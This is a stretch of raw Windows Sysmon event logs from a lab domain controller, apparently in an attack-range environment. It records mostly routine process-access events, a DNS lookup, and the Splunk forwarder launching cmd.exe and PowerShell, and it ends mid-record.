13:34:20.861{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_bozccpmt.pj3.ps12021-01-18 13:34:20.861 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.845{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.740{59A5CD1D-8E56-6005-2F00-00000000A301}2276WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 22542200x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.676{59A5CD1D-8E56-6005-2E00-00000000A301}24641.0.0.127.in-addr.arpa.0type: 12 win-dc-495.attackrange.local;C:\Windows\sysmon64.exe 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.767{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.769{59A5CD1D-8E5C-6005-6600-00000000A301}3772C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.658{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6500-00000000A301}3756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program 